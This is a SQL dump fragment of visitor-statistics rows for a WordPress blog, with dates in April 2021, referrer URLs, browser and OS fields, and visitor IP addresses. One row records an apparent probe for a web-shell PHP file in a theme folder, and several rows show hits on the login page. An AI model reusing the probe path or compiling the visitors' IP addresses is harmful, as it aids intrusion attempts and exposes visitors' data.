(10561,'2021-04-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,2,0),
(10562,'2021-04-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(10563,'2021-04-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(10564,'2021-04-09','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','95.217.207.28','000',0,1,0),
(10565,'2021-04-09','http://ictbank.ir/blog','Yandex Browser','Windows','5.1',NULL,NULL,'','2.58.46.236','000',0,2,0),
(10566,'2021-04-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','89.248.165.177','000',0,1,0),
(10567,'2021-04-09','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.169.233.45','000',0,2,0),
(10568,'2021-04-09','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','18.224.23.254','000',0,1,0),
(10569,'2021-04-10','https://duckduckgo.com/','Firefox','Fedora','Unknown',NULL,NULL,'','24.194.232.249','000',0,3,0),
(10570,'2021-04-10','http://ictbank.ir/blog','Android Browser','Android','4.1.2',NULL,NULL,'','213.232.87.128','000',0,2,0),
(10571,'2021-04-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','107.151.182.62','000',0,1,0),
(10572,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.89.114.23','000',0,2,0),
(10573,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','52.60.189.115','000',0,82,0),
(10574,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.250.87.247','000',0,34,0),
(10575,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','4.0',NULL,NULL,'','18.184.155.204','000',0,80,0),
(10576,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','35.178.16.1','000',0,42,0),
(10577,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.214','000',0,2,0),
(10578,'2021-04-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(10579,'2021-04-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.211','000',0,6,0),
(10580,'2021-04-10','http://ictbank.ir/blog','Android Browser','Android','4.2.2',NULL,NULL,'','82.102.27.217','000',0,2,0),
(10581,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','3.8.12.221','000',0,40,0),
(10582,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','6.4',NULL,NULL,'','18.231.94.162','000',0,74,0),
(10583,'2021-04-10','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','13.124.222.242','000',0,40,0),
(10584,'2021-04-10','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','14.168.196.88','000',0,2,0),
(10585,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','13.209.28.104','000',0,40,0),
(10586,'2021-04-10','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','44.192.97.75','000',0,1,0),
(10587,'2021-04-10','http://ictbank.ir/blog','Android Browser','Android','4.3',NULL,NULL,'','37.120.217.196','000',0,2,0),
(10588,'2021-04-10','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.164','000',0,1,0),
(10589,'2021-04-10','http://ictbank.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','36.72.235.37','000',0,2,0),
(10590,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','52.52.190.187','000',0,2,0),
(10591,'2021-04-10','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.136','000',0,1,0),
(10592,'2021-04-10','http://ictbank.ir/blog','Chrome','OS X','10.10.4',NULL,NULL,'','91.232.159.35','000',0,1,0),
(10593,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','34.251.241.226','000',0,4,0),
(10594,'2021-04-10','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','34.236.202.207','000',0,40,0),
(10595,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.226.201','000',0,1,0),
(10596,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','54.176.188.51','000',0,2,0),
(10597,'2021-04-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','34.203.37.48','000',0,2,0),
(10598,'2021-04-10','http://ictbank.ir/blog','Chrome','OS X','10.8.0',NULL,NULL,'','52.42.79.222','000',0,74,0),
(10599,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','35.181.112.20','000',0,36,0),
(10600,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','13.228.104.57','000',0,36,0),
(10601,'2021-04-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.3.146.243','000',0,1,0),
(10602,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','52.15.212.3','000',0,40,0),
(10603,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','18.197.125.181','000',0,2,0),
(10604,'2021-04-10','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','49.234.43.244','000',0,1,0),
(10605,'2021-04-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','5.208.188.195','000',0,1,0),
(10606,'2021-04-10','http://ictbank.ir/blog','Chrome','Android','4.3',NULL,NULL,'','54.226.224.45','000',0,1,0),
(10607,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','13.53.64.97','000',0,38,0),
(10608,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','34.215.69.55','000',0,26,0),
(10609,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.21.50','000',0,1,0),
(10610,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','52.192.73.251','000',0,40,0),
(10611,'2021-04-10','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','217.146.82.243','000',0,2,0),
(10612,'2021-04-10','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','34.209.105.222','000',0,40,0),
(10613,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','34.230.156.67','000',0,2,0),
(10614,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','35.180.147.121','000',0,40,0),
(10615,'2021-04-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','3.0.115.255','000',0,40,0),
(10616,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','13.232.96.15','000',0,40,0),
(10617,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','35.183.60.188','000',0,40,0),
(10618,'2021-04-10','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','37.120.204.164','000',0,2,0),
(10619,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','18.136.72.135','000',0,40,0),
(10620,'2021-04-10','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','202.112.51.138','000',0,1,0),
(10621,'2021-04-10','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','45.152.15.54','000',0,2,0),
(10622,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','35.181.87.238','000',0,40,0),
(10623,'2021-04-10','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','142.93.185.140','000',0,1,0),
(10624,'2021-04-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.38.150.121','000',0,2,0),
(10625,'2021-04-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,2,0),
(10626,'2021-04-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(10627,'2021-04-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(10628,'2021-04-10','http://ictbank.ir/blog','Android Browser','Android','4.1.2',NULL,NULL,'','194.110.84.12','000',0,2,0),
(10629,'2021-04-10','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','31.207.34.244','000',0,3,0),
(10630,'2021-04-10','https://www.google.hu/','Firefox','Fedora','Unknown',NULL,NULL,'','84.236.91.197','000',0,1,0),
(10631,'2021-04-10','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','82.208.178.35','000',0,1,0),
(10632,'2021-04-11','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','54.78.43.150','000',0,1,0),
(10633,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.210.92.249','000',0,3,0),
(10634,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','52.30.16.188','000',0,2,0),
(10635,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','18.197.125.181','000',0,74,0),
(10636,'2021-04-11','http://ictbank.ir/blog','Chrome','Chrome OS','Unknown',NULL,NULL,'','35.183.60.188','000',0,40,0),
(10637,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','13.232.96.15','000',0,40,0),
(10638,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','13.228.104.57','000',0,2,0),
(10639,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','18.231.94.162','000',0,42,0),
(10640,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','52.192.73.251','000',0,79,0),
(10641,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','35.180.147.121','000',0,42,0),
(10642,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','52.60.189.115','000',0,40,0),
(10643,'2021-04-11','http://ictbank.ir/blog','Android Browser','Android','4.4.2',NULL,NULL,'','217.138.219.164','000',0,2,0),
(10644,'2021-04-11','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.100','000',0,1,0),
(10645,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','3.8.68.2','000',0,40,0),
(10646,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','54.176.188.51','000',0,78,0),
(10647,'2021-04-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','52.64.20.252','000',0,40,0),
(10648,'2021-04-11','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','34.236.55.223','000',0,34,0),
(10649,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','34.203.37.48','000',0,34,0),
(10650,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','34.209.105.222','000',0,34,0),
(10651,'2021-04-11','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','213.232.87.72','000',0,2,0),
(10652,'2021-04-11','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','13.53.208.18','000',0,40,0),
(10653,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','35.181.112.20','000',0,40,0),
(10654,'2021-04-11','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','3.0.115.255','000',0,38,0),
(10655,'2021-04-11','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','50.31.21.6','000',0,1,0),
(10656,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','52.65.15.196','000',0,38,0),
(10657,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','18.221.206.247','000',0,38,0),
(10658,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','52.42.79.222','000',0,2,0),
(10659,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','13.209.28.104','000',0,38,0),
(10660,'2021-04-11','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','69.162.89.188','000',0,1,0),
(10661,'2021-04-11','http://ictbank.ir/blog','Opera','Windows','6.3',NULL,NULL,'','217.138.219.150','000',0,2,0),
(10662,'2021-04-11','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','45.142.176.122','000',0,2,0),
(10663,'2021-04-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','52.52.190.187','000',0,40,0),
(10664,'2021-04-11','http://ictbank.ir/blog','Chrome','OpenBSD','',NULL,NULL,'','34.215.69.55','000',0,2,0),
(10665,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.76.24','000',0,1,0),
(10666,'2021-04-11','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','44.192.90.255','000',0,1,0),
(10667,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.183.106.28','000',0,2,0),
(10668,'2021-04-11','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.46.255.64','000',0,1,0),
(10669,'2021-04-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(10670,'2021-04-11','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','95.129.140.145','000',0,1,0),
(10671,'2021-04-11','http://design-arena.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.89.228.207','000',0,1,0),
(10672,'2021-04-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.31.65','000',0,1,0),
(10673,'2021-04-11','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','193.106.30.100','000',0,1,0),
(10674,'2021-04-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.211','000',0,3,0),
(10675,'2021-04-11','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','185.59.221.246','000',0,2,0),
(10676,'2021-04-11','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','47.18.198.9','000',0,2,0),
(10677,'2021-04-11','http://ictbank.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','112.211.7.251','000',0,2,0),
(10678,'2021-04-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(10679,'2021-04-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(10680,'2021-04-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(10681,'2021-04-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(10682,'2021-04-11','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','5.180.62.52','000',0,2,0),
(10683,'2021-04-11','http://ictbank.ir/blog','Instagram','iOS','11.4',NULL,NULL,'','196.240.57.196','000',0,2,0),
(10684,'2021-04-12','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','132.148.156.30','000',0,3,0),
(10685,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','18.229.73.207','000',0,82,0),
(10686,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','13.53.208.18','000',0,42,0),
(10687,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','52.30.16.188','000',0,40,0),
(10688,'2021-04-12','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','13.209.28.104','000',0,74,0),
(10689,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','34.209.105.222','000',0,42,0),
(10690,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','13.53.64.97','000',0,80,0),
(10691,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','34.241.77.13','000',0,40,0),
(10692,'2021-04-12','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.1',NULL,NULL,'','195.154.185.157','000',0,2,0),
(10693,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','13.124.222.242','000',0,42,0),
(10694,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','35.183.60.188','000',0,40,0),
(10695,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','52.65.15.196','000',0,34,0),
(10696,'2021-04-12','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','52.60.189.115','000',0,34,0),
(10697,'2021-04-12','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','106.247.65.130','000',0,1,0),
(10698,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','18.136.72.135','000',0,42,0),
(10699,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','69.195.141.84','000',0,3,0),
(10700,'2021-04-12','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','112.51.25.180','000',0,3,0),
(10701,'2021-04-12','http://ictbank.ir/blog','Android Browser','Android','4.3',NULL,NULL,'','84.17.62.231','000',0,2,0),
(10702,'2021-04-12','http://ictbank.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','113.161.176.31','000',0,2,0),
(10703,'2021-04-12','http://ictbank.ir/blog','Facebook','Android','6.0',NULL,NULL,'','195.206.169.226','000',0,2,0),
(10704,'2021-04-12','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','36.134.69.69','000',0,1,0),
(10705,'2021-04-12','http://ictbank.ir/blog','Safari','OS X','10.15.6',NULL,NULL,'','5.113.195.178','000',0,4,0),
(10706,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.132.129','000',0,1,0),
(10707,'2021-04-12','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','37.120.217.252','000',0,2,0),
(10708,'2021-04-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','170.81.211.11','000',0,1,0),
(10709,'2021-04-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.211','000',0,3,0),
(10710,'2021-04-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.211.190','000',0,1,0),
(10711,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.172.16','000',0,1,0),
(10712,'2021-04-12','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','195.206.183.157','000',0,2,0),
(10713,'2021-04-12','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','5.134.132.106','000',0,2,0),
(10714,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.52.190.187','000',0,38,0),
(10715,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.185.135','000',0,1,0),
(10716,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','13.236.114.230','000',0,40,0),
(10717,'2021-04-12','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','89.40.71.100','000',0,2,0),
(10718,'2021-04-12','http://ictbank.ir/blog','Chrome','OS X','10.8.0',NULL,NULL,'','35.181.87.238','000',0,40,0),
(10719,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','18.194.196.202','000',0,38,0),
(10720,'2021-04-12','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','34.215.69.55','000',0,34,0),
(10721,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','13.58.56.77','000',0,2,0),
(10722,'2021-04-12','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','34.236.202.207','000',0,40,0),
(10723,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','18.221.206.247','000',0,38,0),
(10724,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','54.178.182.46','000',0,40,0),
(10725,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','3.8.12.221','000',0,38,0),
(10726,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','18.197.125.181','000',0,40,0),
(10727,'2021-04-12','http://ictbank.ir/blog','Instagram','Android','6.0.1',NULL,NULL,'','89.187.189.196','000',0,2,0),
(10728,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','3.0.115.255','000',0,38,0),
(10729,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','13.228.104.57','000',0,40,0),
(10730,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','13.233.73.212','000',0,40,0),
(10731,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','52.192.73.251','000',0,40,0),
(10732,'2021-04-12','http://ictbank.ir/blog','Instagram','iOS','11.4',NULL,NULL,'','178.175.133.100','000',0,2,0),
(10733,'2021-04-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(10734,'2021-04-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(10735,'2021-04-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(10736,'2021-04-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(10737,'2021-04-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.9.8.180','000',0,1,0),
(10738,'2021-04-12','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','178.239.173.180','000',0,2,0),
(10739,'2021-04-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','104.244.77.101','000',0,3,0),
(10740,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','109.70.100.60','000',0,2,0),
(10741,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','109.70.100.44','000',0,1,0),
(10742,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','192.160.102.170','000',0,3,0),
(10743,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','113.186.203.65','000',0,3,0),
(10744,'2021-04-13','http://ictbank.ir/blog','Chrome','Chrome OS','Unknown',NULL,NULL,'','203.177.69.162','000',0,3,0),
(10745,'2021-04-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.82.216.14','000',0,18,0),
(10746,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','185.220.100.250','000',0,2,0),
(10747,'2021-04-13','http://ictbank.ir/blog','Chrome','OS X','10.7.5',NULL,NULL,'','185.220.100.240','000',0,1,0),
(10748,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','185.220.101.137','000',0,1,0),
(10749,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.220.101.217','000',0,2,0),
(10750,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','199.249.230.146','000',0,3,0),
(10751,'2021-04-13','http://ictbank.ir/blog','UC Browser','Android','4.1.1',NULL,NULL,'','185.169.233.241','000',0,2,0),
(10752,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','18.221.206.247','000',0,2,0),
(10753,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','35.181.87.238','000',0,42,0),
(10754,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','35.181.112.20','000',0,38,0),
(10755,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','52.52.190.187','000',0,36,0),
(10756,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','52.60.189.115','000',0,38,0),
(10757,'2021-04-13','http://ictbank.ir/blog','Chrome','OS X','10.8.0',NULL,NULL,'','13.124.222.242','000',0,38,0),
(10758,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','13.48.53.51','000',0,40,0),
(10759,'2021-04-13','http://ictbank.ir/blog','Chrome','OS X','10.9.0',NULL,NULL,'','54.176.188.51','000',0,38,0),
(10760,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','35.183.60.188','000',0,38,0),
(10761,'2021-04-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','13.209.28.104','000',0,4,0),
(10762,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','54.250.87.247','000',0,2,0),
(10763,'2021-04-13','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','13.236.114.230','000',0,2,0),
(10764,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','37.187.196.70','000',0,2,0),
(10765,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.56.80.65','000',0,1,0),
(10766,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','77.247.181.163','000',0,1,0),
(10767,'2021-04-13','http://ictbank.ir/blog','Chrome','NetBSD','',NULL,NULL,'','109.70.100.41','000',0,1,0),
(10768,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','45.141.159.63','000',0,1,0),
(10769,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.15.235.211','000',0,2,0),
(10770,'2021-04-13','http://ictbank.ir/blog','Internet Explorer','OS X','10.7.3',NULL,NULL,'','185.67.82.114','000',0,1,0),
(10771,'2021-04-13','http://ictbank.ir/blog','Chrome','OS X','10.8.0',NULL,NULL,'','41.60.233.66','000',0,3,0),
(10772,'2021-04-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.211','000',0,6,0),
(10773,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','34.241.77.13','000',0,36,0),
(10774,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','34.215.69.55','000',0,2,0),
(10775,'2021-04-13','http://ictbank.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','89.64.50.66','000',0,2,0),
(10776,'2021-04-13','http://ictbank.ir/blog','UC Browser','Android','5.1.1',NULL,NULL,'','194.36.108.76','000',0,2,0),
(10777,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.195.92','000',0,1,0),
(10778,'2021-04-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(10779,'2021-04-13','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','185.169.233.40','000',0,2,0),
(10780,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','89.248.172.16','000',0,1,0),
(10781,'2021-04-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.98.64','000',0,1,0),
(10782,'2021-04-13','http://ictbank.ir/blog','Safari','OS X','10.15.6',NULL,NULL,'','5.238.253.32','000',0,1,0),
(10783,'2021-04-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,2,0),
(10784,'2021-04-13','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','185.16.207.44','000',0,2,0),
(10785,'2021-04-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(10786,'2021-04-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,2,0),
(10787,'2021-04-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
